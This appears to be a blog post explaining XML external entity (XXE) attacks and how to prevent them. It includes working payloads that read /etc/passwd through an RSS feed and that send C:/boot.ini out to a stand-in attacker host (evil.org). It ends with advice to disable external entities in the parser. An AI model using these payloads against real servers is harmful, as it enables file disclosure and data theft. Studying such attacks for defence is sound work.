Like directory traversal attacks, XML external entity attacks allow the attacker to read arbitrary files on the server from SSL private keys to password files.
A little known “feature” of XML is external entities, whereby developers can define their own XML entities. For example, this sample XML-based Really Simple Syndication (RSS) document defines the &author; entity and uses it throughout the page:
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ENTITY author "Fluffy Bunny"> ]> <tag>&author;</tag>
You can also define entities that read system files. For example, when an XML parser reads the following RSS document, the parser will replace &passwd; or &passwd2; with /etc/passwd:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY passwd SYSTEM "file:/etc/passwd">
<!ENTITY passwd2 SYSTEM "file:///etc/passwd">
]>
<rss version="2.0">
<channel>
<title>My attack RSS feed showing /etc/passwd</title>
<description>this is file:/etc/passwd: &passwd; and this is
ile:///etc/passwd: &passwd;</description>
<item>
<title>/etc/passwd</title>
<description>file:/etc/passwd: &passwd; file:///etc/passwd:
passwd;</description>
<link>http://example.com</link>
</item>
</channel>
</rss>To exploit this attack, the attacker simply places this RSS file on his or her web site and adds this attack RSS feed to some online RSS aggregator. If the RSS aggregator is vulnerable, the attacker will see the contents of /etc/passwd on the vulnerable aggregator while viewing the attack RSS feed.
By simply uploading an XML file, the XML file can even send the files back to the attacker. This is great for attacking backend systems where the attacker will never see the output of the XML file. Create one entity to load up a sensitive file on the server (say c:\boot.ini) and create another entity loading an URL to the attacker’s site with the former entity within the request, as so:
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE doc [ <!ENTITY bootini SYSTEM "file:///C:/boot.ini "> <!ENTITY sendbootini SYSTEM "http://evil.org/getBootIni?&bootini;"> ]> &sendbootini;
Obviously, this attack can lead to arbitrary file disclosure on the vulnerable web server. It is not limited to RSS feeds. This attack can be mounted on all web applications that accept XML documents and parse the document.
It’s amazing how many web applications integrate RSS feeds as an add-on feature. These applications tend to add this feature as an afterthought and are vulnerable to this attack.
Countermeasure Preventing XXE Attacks
To protect against XXE attacks, simply instruct the XML parser you use to prohibit external entities. Prohibiting external entities varies depending on the XML parser used. For example, JAXP and Xerces do not resolve entities by default, while developers must explicitly turn off entity expansion in LibXML using expand_entities(0);.
'Hacking' 카테고리의 다른 글
| Buffer Overflows (0) | 2008.10.03 |
|---|---|
| LDAP Injection (0) | 2008.10.03 |
| Directory Traversal Attacks (0) | 2008.10.03 |
| Command Injection (0) | 2008.10.03 |
| XPath Injection (0) | 2008.10.03 |
